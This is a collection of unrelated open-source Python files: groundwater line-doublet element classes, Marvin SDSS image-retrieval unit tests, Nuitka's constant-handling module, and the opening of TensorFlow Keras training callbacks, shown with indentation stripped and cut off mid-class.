list or array of (x,y) pairs of coordinates of end-points of
the segements in the string
layers : scalar, list or array
layer(s) in which element is placed
if scalar: element is placed in this layer
if list or array: element is placed in all these layers
order : int (default is 0)
polynomial order of potential jump along line-doublet
(head jump if transmissivity is equal on each side of wall)
label: str or None
label of element
See Also
--------
:class:`.ImpLineDoublet`
"""
def __init__(self, model, xy=[(-1, 0), (1, 0)], \
layers=0, order=0, label=None):
self.storeinput(inspect.currentframe())
LineDoubletStringBase.__init__(self, model, xy, closed=False,
res=np.inf, layers=layers, order=order, \
name='ImpLineDoubletString', label=label,
aq=None)
self.model.add_element(self)
def initialize(self):
LineDoubletStringBase.initialize(self)
self.aq.add_element(self)
def setparams(self, sol):
self.parameters[:, 0] = sol
class LeakyLineDoubletString(LineDoubletStringBase, LeakyWallEquation):
"""
Create a string of leaky wall segements consisting
of line-doublets
Parameters
----------
model : Model object
Model to which the element is added
xy : array or list
list or array of (x,y) pairs of coordinates of end-points of
the segements in the string
res : scalar
resistance of leaky wall
layers : scalar, list or array
layer(s) in which element is placed
if scalar: element is placed in this layer
if list or array: element is placed in all these layers
order : int (default is 0)
polynomial order of potential jump along line-doublet
(head jump if transmissivity is equal on each side of wall)
label: str or None
label of element
See Also
--------
:class:`.ImpLineDoublet`
"""
def __init__(self, model, xy=[(-1, 0), (1, 0)], res=np.inf,\
layers=0, order=0, label=None):
self.storeinput(inspect.currentframe())
LineDoubletStringBase.__init__(self, model, xy, closed=False,
layers=layers, order=order, res=res,\
name='ImpLineDoubletString', label=label,
aq=None)
self.model.add_element(self)
def initialize(self):
LineDoubletStringBase.initialize(self)
self.aq.add_element(self)
def setparams(self, sol):
self.parameters[:, 0] = sol
| |
# !usr/bin/env python2
# -*- coding: utf-8 -*-
#
# Licensed under a 3-clause BSD license.
#
# @Author: Brian Cherinka
# @Date: 2017-02-01 17:41:51
# @Last modified by: Brian Cherinka
# @Last Modified time: 2017-02-19 16:51:20
from __future__ import print_function, division, absolute_import
import unittest
import os
import glob
import warnings
from marvin import config
from marvin.core.exceptions import MarvinError, MarvinUserWarning
from marvin.tools.plate import Plate
from marvin.tests import MarvinTest, skipIfNoBrian
from marvin.utils.general.images import getImagesByList, getImagesByPlate, getRandomImages, getDir3d, showImage
try:
from sdss_access import RsyncAccess, AccessError
except ImportError:
Path = None
RsyncAccess = None
class TestImagesBase(MarvinTest):
@classmethod
def setUpClass(cls):
super(TestImagesBase, cls).setUpClass()
cls.imagelist = ['8485-1901', '7443-12701', '7443-1901']
cls.mastar_plateifu = '8705-1901'
cls.new_plateifu = '7495-1901'
cls.new_plate = 7495
cls.new_ifu = '1901'
cls.new_file = 'manga-{0}-LOGCUBE.fits.gz'.format(cls.new_plateifu)
cls.remoteredux = 'https://sdss@dtn01.sdss.org/sas/mangawork/manga/spectro/redux/'
cls.remoteurl = 'https://data.sdss.org/sas/mangawork/manga/spectro/redux/'
@classmethod
def tearDownClass(cls):
pass
def setUp(self):
self._reset_the_config()
self.set_sasurl('local')
self.mode = self.init_mode
config.setMPL('MPL-4')
config.forceDbOn()
self.drpver, __ = config.lookUpVersions(release=config.release)
def tearDown(self):
plate, ifu = self.new_plateifu.split('-')
newdir = os.path.join(self.mangaredux, self.drpver, plate, 'stack/images')
newpath = os.path.join(newdir, '*.png')
newfiles = glob.glob(newpath)
for file in newfiles:
if os.path.isfile(file):
os.remove(file)
self._remove_cube(release='MPL-5')
self._remove_cube(release='MPL-4')
def _make_paths(self, basepath, mode=None, inputs=None):
fullpaths = []
inputs = self.imagelist if not inputs else inputs
for plateifu in inputs:
plateid, ifu = plateifu.split('-')
dir3d = getDir3d(plateifu, mode=mode)
thepath = os.path.join(basepath, self.drpver, plateid, dir3d, 'images', ifu + '.png')
fullpaths.append(thepath)
return fullpaths
def _get_cube(self, release=None):
if release:
self._update_release(release)
filepath = os.path.join(self.mangaredux, self.drpver, str(self.new_plate), 'stack', self.new_file)
if not os.path.isfile(filepath):
rsync_access = RsyncAccess(label='marvin_getlist', verbose=False)
rsync_access.remote()
rsync_access.add('mangacube', plate=self.new_plate, drpver=self.drpver, ifu=self.new_ifu, dir3d='stack')
rsync_access.set_stream()
rsync_access.commit()
def _remove_cube(self, release=None):
if release:
self._update_release(release)
filepath = os.path.join(self.mangaredux, self.drpver, str(self.new_plate), 'stack', self.new_file)
if os.path.isfile(filepath):
os.remove(filepath)
class TestGetDir3d(TestImagesBase):
def _getdir3d(self, expval, mode=None, plateifu=None):
plateifu = self.plateifu if not plateifu else plateifu
dir3d = getDir3d(plateifu, mode=mode, release=config.release)
self.assertEqual(expval, dir3d)
def test_getdir3d_local(self):
self._getdir3d('stack', mode='local')
def test_getdir3d_remote(self):
self._getdir3d('stack', mode='remote')
def test_getdir3d_auto(self):
self._getdir3d('stack', mode='auto')
def test_getdir3d_mastar_local(self):
self._update_release('MPL-5')
self._getdir3d('stack', mode='local')
def test_getdir3d_mpl5_remote(self):
self._update_release('MPL-5')
self._getdir3d('stack', mode='remote')
def test_getdir3d_mpl5_auto(self):
self._update_release('MPL-5')
self._getdir3d('stack', mode='auto')
def test_getdir3d_local_plate(self):
self._update_release('MPL-5')
self._getdir3d('stack', mode='local', plateifu=self.plate)
def test_getdir3d_remote_plate(self):
self._update_release('MPL-5')
self._getdir3d('stack', mode='remote', plateifu=self.plate)
def test_getdir3d_auto_plate(self):
self._update_release('MPL-5')
self._getdir3d('stack', mode='auto', plateifu=self.plate)
def test_getdir3d_local_plate_nodb(self):
self._update_release('MPL-5')
config.forceDbOff()
self._getdir3d('stack', mode='local', plateifu=self.plate)
def test_getdir3d_remote_plate_nodb(self):
self._update_release('MPL-5')
config.forceDbOff()
self._getdir3d('stack', mode='remote', plateifu=self.plate)
def test_getdir3d_auto_plate_nodb(self):
self._update_release('MPL-5')
config.forceDbOff()
self._getdir3d('stack', mode='auto', plateifu=self.plate)
def test_getdir3d_local_newplate_nocubes(self):
self._update_release('MPL-5')
config.forceDbOff()
errmsg = 'this is the end of the road. Try using some reasonable inputs.'
with self.assertRaises(MarvinError) as cm:
self._getdir3d('stack', mode='local', plateifu=self.new_plate)
self.assertIn(errmsg, str(cm.exception))
def test_getdir3d_remote_newplate(self):
self._update_release('MPL-4')
config.forceDbOff()
self._getdir3d('stack', mode='remote', plateifu=self.new_plate)
@unittest.SkipTest
def test_getdir3d_remote_newplate_fail(self):
self._update_release('MPL-5')
config.forceDbOff()
errmsg = 'Could not retrieve a remote plate. If it is a mastar'
with self.assertRaises(MarvinError) as cm:
self._getdir3d('stack', mode='remote', plateifu=self.new_plate)
self.assertIn(errmsg, str(cm.exception))
def test_getdir3d_auto_newplate(self):
self._update_release('MPL-4')
config.forceDbOff()
self._getdir3d('stack', mode='auto', plateifu=self.new_plate)
@unittest.SkipTest
def test_getdir3d_mastar_local(self):
self._update_release('MPL-5')
config.forceDbOff()
self._getdir3d('mastar', mode='local', plateifu=self.mastar_plateifu)
@unittest.SkipTest
def test_getdir3d_mastar_remote(self):
self._update_release('MPL-5')
config.forceDbOff()
self._getdir3d('mastar', mode='remote', plateifu=self.mastar_plateifu)
@unittest.SkipTest
def test_getdir3d_mastar_auto(self):
self._update_release('MPL-5')
config.forceDbOff()
self._getdir3d('mastar', mode='auto', plateifu=self.mastar_plateifu)
class TestImagesByList(TestImagesBase):
def test_notvalid_input(self):
errmsg = 'Input must be of type list or Numpy array'
with self.assertRaises(AssertionError) as cm:
image = getImagesByList(self.new_plateifu, mode='local')
self.assertIn(errmsg, str(cm.exception))
def test_notvalid_objectid(self):
errmsg = 'Input must be of type plate-ifu or mangaid'
with self.assertRaises(AssertionError) as cm:
image = getImagesByList(['nogoodid'], mode='local')
self.assertIn(errmsg, str(cm.exception))
def test_notvalid_mode(self):
errmsg = 'Mode must be either auto, local, or remote'
with self.assertRaises(AssertionError) as cm:
image = getImagesByList(self.imagelist, mode='notvalidmode')
self.assertIn(errmsg, str(cm.exception))
def _get_imagelist(self, explist, inputlist=None, mode=None, as_url=None):
images = getImagesByList(inputlist, mode=mode, as_url=as_url)
self.assertListEqual(explist, images)
def test_get_images_auto(self):
mode = 'auto'
paths = self._make_paths(self.mangaredux, mode=mode)
self._get_imagelist(paths, inputlist=self.imagelist, mode=mode)
def test_get_images_local(self):
mode = 'local'
paths = self._make_paths(self.mangaredux, mode=mode)
self._get_imagelist(paths, inputlist=self.imagelist, mode=mode)
def test_get_images_local_url(self):
mode = 'local'
paths = self._make_paths(self.remoteurl, mode=mode)
self._get_imagelist(paths, inputlist=self.imagelist, mode=mode, as_url=True)
def test_get_images_remote_url(self):
mode = 'remote'
paths = self._make_paths(self.remoteredux, mode=mode)
self._get_imagelist(paths, inputlist=self.imagelist, mode=mode, as_url=True)
def test_get_images_remote(self):
mode = 'remote'
paths = self._make_paths(self.mangaredux, mode=mode)
self._get_imagelist(paths, inputlist=self.imagelist, mode=mode)
def test_get_images_download_remote(self):
localpath = self._make_paths(self.mangaredux, mode='local', inputs=[self.new_plateifu])
remotepath = self._make_paths(self.remoteredux, mode='remote', inputs=[self.new_plateifu])
self.assertFalse(os.path.isfile(localpath[0]))
image = getImagesByList([self.new_plateifu], mode='remote', as_url=True, download=True)
self.assertTrue(os.path.isfile(localpath[0]))
self.assertIsNone(image)
def test_get_images_download_local_fail(self):
localpath = self._make_paths(self.mangaredux, mode='local', inputs=[self.new_plateifu])
remotepath = self._make_paths(self.remoteredux, mode='remote', inputs=[self.new_plateifu])
self.assertFalse(os.path.isfile(localpath[0]))
errmsg = 'Download not available when in local mode'
with warnings.catch_warnings(record=True) as cm:
warnings.simplefilter("always")
image = getImagesByList([self.new_plateifu], mode='local', as_url=True, download=True)
self.assertIs(cm[-1].category, MarvinUserWarning)
self.assertIn(errmsg, str(cm[-1].message))
class TestImagesByPlate(TestImagesBase):
def test_notvalid_plate(self):
errmsg = 'Plateid must be a numeric integer value'
with self.assertRaises(AssertionError) as cm:
image = getImagesByPlate('8485abc', mode='local')
self.assertIn(errmsg, str(cm.exception))
def test_notvalid_mode(self):
errmsg = 'Mode must be either auto, local, or remote'
with self.assertRaises(AssertionError) as cm:
image = getImagesByPlate(self.plate, mode='notvalidmode')
self.assertIn(errmsg, str(cm.exception))
def _get_imageplate(self, explist, plate=None, mode=None, as_url=None):
images = getImagesByPlate(plate, mode=mode, as_url=as_url)
self.assertIn(explist[0], images)
def test_get_images_auto(self):
mode = 'auto'
paths = self._make_paths(self.mangaredux, mode=mode, inputs=[self.plateifu])
self._get_imageplate(paths, plate=self.plate, mode=mode)
def test_get_images_local(self):
mode = 'local'
paths = self._make_paths(self.mangaredux, mode=mode, inputs=[self.plateifu])
self._get_imageplate(paths, plate=self.plate, mode=mode)
def test_get_images_local_url(self):
mode = 'local'
paths = self._make_paths(self.remoteurl, mode=mode, inputs=[self.plateifu])
self._get_imageplate(paths, plate=self.plate, mode=mode, as_url=True)
def test_get_images_remote_url(self):
mode = 'remote'
paths = self._make_paths(self.remoteredux, mode=mode, inputs=[self.plateifu])
self._get_imageplate(paths, plate=self.plate, mode=mode, as_url=True)
def test_get_images_remote(self):
mode = 'remote'
paths = self._make_paths(self.mangaredux, mode=mode, inputs=[self.plateifu])
self._get_imageplate(paths, plate=self.plate, mode=mode)
def test_get_images_download_remote(self):
self._update_release('MPL-4')
config.forceDbOff()
self._get_cube()
localpath = self._make_paths(self.mangaredux, mode='local', inputs=[self.new_plateifu])
remotepath = self._make_paths(self.remoteredux, mode='remote', inputs=[self.new_plateifu])
self.assertFalse(os.path.isfile(localpath[0]))
image = getImagesByPlate(self.new_plate, mode='remote', as_url=True, download=True)
self.assertTrue(os.path.isfile(localpath[0]))
self.assertIsNone(image)
def test_get_images_download_local_fail(self):
localpath = self._make_paths(self.mangaredux, mode='local', inputs=[self.new_plateifu])
remotepath = self._make_paths(self.remoteredux, mode='remote', inputs=[self.new_plateifu])
self.assertFalse(os.path.isfile(localpath[0]))
errmsg = 'Download not available when in local mode'
with warnings.catch_warnings(record=True) as cm:
warnings.simplefilter("always")
image = getImagesByPlate(self.new_plate, mode='local', as_url=True, download=True)
self.assertIs(cm[-1].category, MarvinUserWarning)
self.assertIn(errmsg, str(cm[-1].message))
class TestRandomImages(TestImagesBase):
def test_notvalid_mode(self):
errmsg = 'Mode must be either auto, local, or remote'
with self.assertRaises(AssertionError) as cm:
image = getRandomImages(mode='notvalidmode')
self.assertIn(errmsg, str(cm.exception))
def test_get_images_download_local_fail(self):
localpath = self._make_paths(self.mangaredux, mode='local', inputs=[self.new_plateifu])
remotepath = self._make_paths(self.remoteredux, mode='remote', inputs=[self.new_plateifu])
self.assertFalse(os.path.isfile(localpath[0]))
errmsg = 'Download not available when in local mode'
with warnings.catch_warnings(record=True) as cm:
warnings.simplefilter("always")
image = getRandomImages(mode='local', as_url=True, download=True)
self.assertIs(cm[-1].category, MarvinUserWarning)
self.assertIn(errmsg, str(cm[-1].message))
def _get_image_random(self, basedir, num=10, mode=None, as_url=None):
images = getRandomImages(num=num, mode=mode, as_url=as_url)
self.assertIn(basedir, images[0])
self.assertIsInstance(images, list)
self.assertIsNotNone(images)
self.assertEqual(num, len(images))
def test_get_images_auto(self):
mode = 'auto'
self._get_image_random(self.mangaredux, mode=mode)
def test_get_images_local(self):
mode = 'local'
self._get_image_random(self.mangaredux, mode=mode)
def test_get_images_local_num5(self):
mode = 'local'
self._get_image_random(self.mangaredux, num=5, mode=mode)
def test_get_images_local_url(self):
mode = 'local'
self._get_image_random(self.remoteurl, mode=mode, as_url=True)
def test_get_images_remote_url(self):
mode = 'remote'
self._get_image_random(self.remoteredux, mode=mode, as_url=True)
def test_get_images_remote(self):
mode = 'remote'
self._get_image_random(self.mangaredux, mode=mode)
def test_get_images_remote_num5(self):
mode = 'remote'
self._get_image_random(self.mangaredux, num=5, mode=mode)
class TestShowImage(TestImagesBase):
def _show_image(self, path=None, plateifu=None, mode=None, release=None, return_image=True, show_image=None):
image = showImage(path=path, plateifu=plateifu, mode=mode, release=release,
return_image=return_image, show_image=show_image)
if return_image:
self.assertIsNotNone(image)
else:
self.assertIsNone(image)
return image
def test_notvalid_mode(self):
errmsg = 'Mode must be either auto, local, or remote'
with self.assertRaises(AssertionError) as cm:
self._show_image(mode='notvalidmode')
self.assertIn(errmsg, str(cm.exception))
def test_noinput(self):
errmsg = 'A filepath or plateifu must be specified!'
with self.assertRaises(AssertionError) as cm:
self._show_image()
self.assertIn(errmsg, str(cm.exception))
# def test_mode_remote(self):
# errmsg = 'showImage currently only works in local mode.'
# with self.assertRaises(MarvinError) as cm:
# self._show_image(plateifu=self.plateifu, mode='remote')
# self.assertIn(errmsg, str(cm.exception))
def test_mode_auto(self):
image = self._show_image(plateifu=self.plateifu, mode='auto')
def test_noreturn(self):
image = self._show_image(plateifu=self.plateifu, return_image=False)
self.assertIsNone(image)
def _plateifu_fail(self, badplateifu, errmsg, mode=None):
with self.assertRaises(MarvinError) as cm:
self._show_image(plateifu=badplateifu, mode=mode)
self.assertIn(errmsg, str(cm.exception))
def test_plateifu_fail_local(self):
badplateifu = '8485-1905'
errmsg = 'Error: No files found locally to match plateifu {0}'.format(badplateifu)
self._plateifu_fail(badplateifu, errmsg, mode='local')
def test_plateifu_fail_remote(self):
badplateifu = '8485-1905'
badfilepath = 'https://data.sdss.org/sas/mangawork/manga/spectro/redux/v1_5_1/8485/stack/images/1905.png'
errmsg = 'Error: remote filepath {0}'.format(badfilepath)
self._plateifu_fail(badplateifu, errmsg, mode='remote')
def test_plateifu_fail_auto(self):
badplateifu = '8485-1905'
badfilepath = 'https://data.sdss.org/sas/mangawork/manga/spectro/redux/v1_5_1/8485/stack/images/1905.png'
errmsg = 'Error: remote filepath {0}'.format(badfilepath)
self._plateifu_fail(badplateifu, errmsg, mode='auto')
def _plateifu_success(self, mode=None):
image = self._show_image(plateifu=self.plateifu, mode=mode)
self.assertIsNotNone(image)
self.assertEqual(image.size, (562, 562))
self.assertEqual(image.format, 'PNG')
self.assertIn(str(self.plate), image.filename)
self.assertIn(self.ifu, image.filename)
if mode == 'remote':
self.assertIn('https://data.sdss.org/sas/', image.filename)
def test_plateifu_success_local(self):
self._plateifu_success(mode='local')
def test_plateifu_success_remote(self):
self._plateifu_success(mode='remote')
def test_plateifu_success_auto(self):
self._plateifu_success(mode='auto')
def test_path_fails_toomany(self):
paths = self._make_paths(self.mangaredux, mode='local')
errmsg = 'showImage currently only works on a single input at a time'
with self.assertRaises(MarvinError) as cm:
self._show_image(path=paths)
self.assertIn(errmsg, str(cm.exception))
def _path_fails_wrongmode(self, path, errmsg, mode=None):
with self.assertRaises(MarvinError) as cm:
self._show_image(path=path, mode=mode)
self.assertIn(errmsg, str(cm.exception))
def test_path_fails_localhttp(self):
paths = self._make_paths(self.remoteurl, mode='remote')
errmsg = 'Remote url path not allowed in local mode'
self._path_fails_wrongmode(paths[0], errmsg, mode='local')
def test_path_fails_remoteuserdir(self):
paths = self._make_paths(self.mangaredux, mode='local')
errmsg = 'Local path not allowed in remote mode'
self._path_fails_wrongmode(paths[0], errmsg, mode='remote')
def _path_success(self, paths, mode=None):
image = self._show_image(path=paths[0], mode=mode)
self.assertIsNotNone(image)
self.assertEqual(image.size, (562, 562))
self.assertEqual(image.format, 'PNG')
self.assertIn(str(self.plate), image.filename)
self.assertIn(self.ifu, image.filename)
if mode == 'remote':
self.assertIn('https://data.sdss.org/sas/', image.filename)
def test_path_success_local(self):
paths = self._make_paths(self.mangaredux, mode='local')
self._path_success(paths, mode='local')
def test_path_success_remote(self):
paths = self._make_paths(self.remoteurl, mode='remote')
self._path_success(paths, mode='remote')
def test_path_success_auto(self):
paths = self._make_paths(self.mangaredux, mode='auto')
self._path_success(paths, mode='auto')
def test_path_badfile(self):
badfile = os.path.expanduser('~/test_image.png')
errmsg = 'Error: local filepath {0} does not exist. '.format(badfile)
with self.assertRaises(MarvinError) as cm:
self._show_image(path=badfile)
self.assertIn(errmsg, str(cm.exception))
if __name__ == '__main__':
verbosity = 2
unittest.main(verbosity=verbosity)
| |
# Copyright 2015, Kay Hayen, mailto:kay.hayen@gmail.com
#
# Part of "Nuitka", an optimizing Python compiler that is compatible and
# integrates with CPython, but also works on its own.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
""" Module for constants in Nuitka.
This contains tools to compare, classify and test constants.
"""
import math
from nuitka.utils.Utils import python_version
from .__past__ import iterItems, long, unicode # pylint: disable=W0622
from .Builtins import builtin_anon_names
NoneType = type(None)
def compareConstants(a, b):
# Many many cases to deal with, pylint: disable=R0911,R0912
# Supposed fast path for comparison.
if type(a) is not type(b):
return False
# Now it's either not the same, or it is a container that contains NaN or it
# is a complex or float that is NaN, the other cases can use == at the end.
if type(a) is complex:
return compareConstants(a.imag, b.imag) and \
compareConstants(a.real, b.real)
if type(a) is float:
# Check sign first, -0.0 is not 0.0, or -nan is not nan, it has a
# different sign for a start.
if math.copysign(1.0, a) != math.copysign(1.0, b):
return False
if math.isnan(a) and math.isnan(b):
return True
return a == b
if type(a) in (tuple, list):
if len(a) != len(b):
return False
for ea, eb in zip(a, b):
if not compareConstants(ea, eb):
return False
return True
if type(a) is dict:
if len(a) != len(b):
return False
for ea1, ea2 in iterItems(a):
for eb1, eb2 in iterItems(b):
if compareConstants(ea1, eb1) and \
compareConstants(ea2, eb2):
break
else:
return False
return True
if type(a) in (frozenset, set):
if len(a) != len(b):
return False
for ea in a:
if ea not in b:
# Due to NaN values, we need to compare each set element with
# all the other set to be really sure.
for eb in b:
if compareConstants(ea, eb):
break
else:
return False
return True
if type(a) is range:
return str(a) == str(b)
# The NaN values of float and complex may let this fail, even if the
# constants are built in the same way.
return a == b
# These built-in type references are kind of constant too. TODO: The list is
# totally not complete.
constant_builtin_types = (
int,
str,
float,
list,
tuple,
set,
dict,
slice,
complex
)
if python_version >= 300:
constant_builtin_types += (
range,
bytes,
)
else:
constant_builtin_types += (
unicode,
long,
# This has no name in Python, but the natural one in C-API.
builtin_anon_names["instance"]
)
def isConstant(constant):
# Too many cases and all return, that is how we do it here,
# pylint: disable=R0911
constant_type = type(constant)
if constant_type is dict:
for key, value in iterItems(constant):
if not isConstant(key):
return False
if not isConstant(value):
return False
return True
elif constant_type in (tuple, list):
for element_value in constant:
if not isConstant(element_value):
return False
return True
elif constant_type in (str, unicode, complex, int, long, bool, float,
NoneType, range, bytes, set):
return True
elif constant in (Ellipsis, NoneType):
return True
elif constant_type is type:
return constant in constant_builtin_types
elif constant_type is slice:
return True
else:
return False
def isMutable(constant):
""" Is a constant mutable
That means a user of a reference to it, can modify it. Strings are
a prime example of mutable, dictionaries are mutable.
"""
constant_type = type(constant)
if constant_type in (str, unicode, complex, int, long, bool, float,
NoneType, range, bytes, slice):
return False
elif constant_type in (dict, list, set):
return True
elif constant_type is tuple:
for value in constant:
if isMutable(value):
return True
return False
elif constant is Ellipsis:
return False
elif constant in constant_builtin_types:
return True
else:
assert False, repr(constant)
def isHashable(constant):
""" Is a constant hashable
That means a user of a reference to it, can use it for dicts and set
keys. This is distinct from mutable, there is one types that is not
mutable, and still not hashable: slices.
"""
# Too many cases and all return, that is how we do it here,
# pylint: disable=R0911
constant_type = type(constant)
if constant_type in (str, unicode, complex, int, long, bool, float,
NoneType, range, bytes):
return True
elif constant_type in (dict, list, set):
return False
elif constant_type is tuple:
for value in constant:
if not isHashable(value):
return False
return True
elif constant is Ellipsis:
return True
elif constant in constant_builtin_types:
return True
elif constant_type is slice:
return False
else:
assert False, constant_type
def isIterableConstant(constant):
return type(constant) in (
str, unicode, list, tuple, set, frozenset, dict, range, bytes
)
def getConstantIterationLength(constant):
assert isIterableConstant(constant)
return len(constant)
def isNumberConstant(constant):
return type(constant) in (int, long, float, bool)
def isIndexConstant(constant):
return type(constant) in (int, long, bool)
def createConstantDict(keys, values, lazy_order):
if lazy_order:
constant_value = {}
keys = list(keys)
keys.reverse()
values = list(values)
values.reverse()
else:
constant_value = dict.fromkeys(
[ key for key in keys ],
None
)
for key, value in zip(keys, values):
constant_value[ key ] = value
return constant_value
def getConstantWeight(constant):
constant_type = type(constant)
if constant_type is dict:
result = 0
for key, value in iterItems(constant):
result += getConstantWeight(key)
result += getConstantWeight(value)
return result
elif constant_type in (tuple, list, set, frozenset):
result = 0
for element_value in constant:
result += getConstantWeight(element_value)
return result
else:
return 1
| |
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=g-import-not-at-top
"""Callbacks: utilities called at certain points during model training.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from collections import deque
from collections import Iterable
from collections import OrderedDict
import csv
import json
import math
import os
import time
import numpy as np
import six
from tensorflow.python.keras import backend as K
from tensorflow.python.keras.utils.generic_utils import Progbar
from tensorflow.python.ops import array_ops
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.summary import summary as tf_summary
from tensorflow.python.util.tf_export import tf_export
try:
import requests
except ImportError:
requests = None
class CallbackList(object):
"""Container abstracting a list of callbacks.
Arguments:
callbacks: List of `Callback` instances.
queue_length: Queue length for keeping
running statistics over callback execution time.
"""
def __init__(self, callbacks=None, queue_length=10):
callbacks = callbacks or []
self.callbacks = [c for c in callbacks]
self.queue_length = queue_length
def append(self, callback):
self.callbacks.append(callback)
def set_params(self, params):
for callback in self.callbacks:
callback.set_params(params)
def set_model(self, model):
for callback in self.callbacks:
callback.set_model(model)
def on_epoch_begin(self, epoch, logs=None):
"""Called at the start of an epoch.
Arguments:
epoch: integer, index of epoch.
logs: dictionary of logs.
"""
logs = logs or {}
for callback in self.callbacks:
callback.on_epoch_begin(epoch, logs)
self._delta_t_batch = 0.
self._delta_ts_batch_begin = deque([], maxlen=self.queue_length)
self._delta_ts_batch_end = deque([], maxlen=self.queue_length)
def on_epoch_end(self, epoch, logs=None):
"""Called at the end of an epoch.
Arguments:
epoch: integer, index of epoch.
logs: dictionary of logs.
"""
logs = logs or {}
for callback in self.callbacks:
callback.on_epoch_end(epoch, logs)
def on_batch_begin(self, batch, logs=None):
"""Called right before processing a batch.
Arguments:
batch: integer, index of batch within the current epoch.
logs: dictionary of logs.
"""
logs = logs or {}
t_before_callbacks = time.time()
for callback in self.callbacks:
callback.on_batch_begin(batch, logs)
self._delta_ts_batch_begin.append(time.time() - t_before_callbacks)
delta_t_median = np.median(self._delta_ts_batch_begin)
if (self._delta_t_batch > 0. and
delta_t_median > 0.95 * self._delta_t_batch and delta_t_median > 0.1):
logging.warning('Method on_batch_begin() is slow compared '
'to the batch update (%f). Check your callbacks.',
delta_t_median)
self._t_enter_batch = time.time()
def on_batch_end(self, batch, logs=None):
"""Called at the end of a batch.
Arguments:
batch: integer, index of batch within the current epoch.
logs: dictionary of logs.
"""
logs = logs or {}
if not hasattr(self, '_t_enter_batch'):
self._t_enter_batch = time.time()
self._delta_t_batch = time.time() - self._t_enter_batch
t_before_callbacks = time.time()
for callback in self.callbacks:
callback.on_batch_end(batch, logs)
self._delta_ts_batch_end.append(time.time() - t_before_callbacks)
delta_t_median = np.median(self._delta_ts_batch_end)
if (self._delta_t_batch > 0. and
(delta_t_median > 0.95 * self._delta_t_batch and delta_t_median > 0.1)):
logging.warning('Method on_batch_end() is slow compared '
'to the batch update (%f). Check your callbacks.',
delta_t_median)
def on_train_begin(self, logs=None):
"""Called at the beginning of training.
Arguments:
logs: dictionary of logs.
"""
logs = logs or {}
for callback in self.callbacks:
callback.on_train_begin(logs)
def on_train_end(self, logs=None):
"""Called at the end of training.
Arguments:
logs: dictionary of logs.
"""
logs = logs or {}
for callback in self.callbacks:
callback.on_train_end(logs)
def __iter__(self):
return iter(self.callbacks)
@tf_export('keras.callbacks.Callback')
class Callback(object):
"""Abstract base class used to build new callbacks.
Attributes:
params: dict. Training parameters
(eg. verbosity, batch size, number of epochs...).
model: instance of `keras.models.Model`.
Reference of the model being trained.
The `logs` dictionary that callback methods
take as argument will contain keys for quantities relevant to
the current batch or epoch.
Currently, the `.fit()` method of the `Sequential` model class
will include the following quantities in the `logs` that
it passes to its callbacks:
on_epoch_end: logs include `acc` and `loss`, and
optionally include `val_loss`
(if validation is enabled in `fit`), and `val_acc`
(if validation and accuracy monitoring are enabled).
on_batch_begin: logs include `size`,
the number of samples in the current batch.
on_batch_end: logs include `loss`, and optionally `acc`
(if accuracy monitoring is enabled).
"""
def __init__(self):
self.validation_data = None
self.model = None
def set_params(self, params):
self.params = params
def set_model(self, model):
self.model = model
def on_epoch_begin(self, epoch, logs=None):
pass
def on_epoch_end(self, epoch, logs=None):
pass
def on_batch_begin(self, batch, logs=None):
pass
def on_batch_end(self, batch, logs=None):
pass
def on_train_begin(self, logs=None):
pass
def on_train_end(self, logs=None):
pass
@tf_export('keras.callbacks.BaseLogger')
class BaseLogger(Callback):
"""Callback that accumulates epoch averages of metrics.
This callback is automatically applied to every Keras model.
Arguments:
stateful_metrics: Iterable of string names of metrics that
should *not* be averaged over an epoch.
Metrics in this list will be logged as-is in `on_epoch_end`.
All others will be averaged in `on_epoch_end`.
"""
def __init__(self, stateful_metrics=None):
super(BaseLogger, self).__init__()
self.stateful_metrics = set(stateful_metrics or [])
def on_epoch_begin(self, epoch, logs=None):
self.seen = 0
self.totals = {}
def on_batch_end(self, batch, logs=None):
logs = logs or {}
batch_size = logs.get('size', 0)
self.seen += batch_size
for k, v in logs.items():
if k in self.stateful_metrics:
self.totals[k] = v
else:
if k in self.totals:
self.totals[k] += v * batch_size
else:
self.totals[k] = v * batch_size
def on_epoch_end(self, epoch, logs=None):
if logs is not None:
for k in self.params['metrics']:
if k in self.totals:
# Make value available to next callbacks.
if k in self.stateful_metrics:
logs[k] = self.totals[k]
else:
logs[k] = self.totals[k] / self.seen
@tf_export('keras.callbacks.TerminateOnNaN')
class TerminateOnNaN(Callback):
"""Callback that terminates training when a NaN loss is encountered.
"""
def on_batch_end(self, batch, logs=None):
logs = logs or {}
loss = logs.get('loss')
if loss is not None:
if np.isnan(loss) or np.isinf(loss):
print('Batch %d: Invalid loss, terminating training' % (batch))
self.model.stop_training = True
@tf_export('keras.callbacks.ProgbarLogger')
class ProgbarLogger(Callback):
"""Callback that prints metrics to stdout.
Arguments:
count_mode: One of "steps" or "samples".
Whether the progress bar should
count samples seen or steps (batches) seen.
stateful_metrics: Iterable of string names of metrics that
should *not* be averaged over an epoch.
Metrics in this list will be logged as-is.
All others will be averaged over time (e.g. loss, etc).
Raises:
ValueError: In case of invalid `count_mode`.
"""
def __init__(self, count_mode='samples', stateful_metrics=None):
super(ProgbarLogger, self).__init__()
if count_mode == 'samples':
self.use_steps = False
elif count_mode == 'steps':
self.use_steps = True
else:
raise ValueError('Unknown `count_mode`: ' + str(count_mode))
self.stateful_metrics = set(stateful_metrics or [])
def on_train_begin(self, logs=None):
self.verbose = self.params['verbose']
self.epochs = self.params['epochs']
def on_epoch_begin(self, epoch, logs=None):
if self.verbose:
print('Epoch %d/%d' % (epoch + 1, self.epochs))
if self.use_steps:
target = self.params['steps']
else:
target = self.params['samples']
self.target = target
self.progbar = Progbar(
target=self.target,
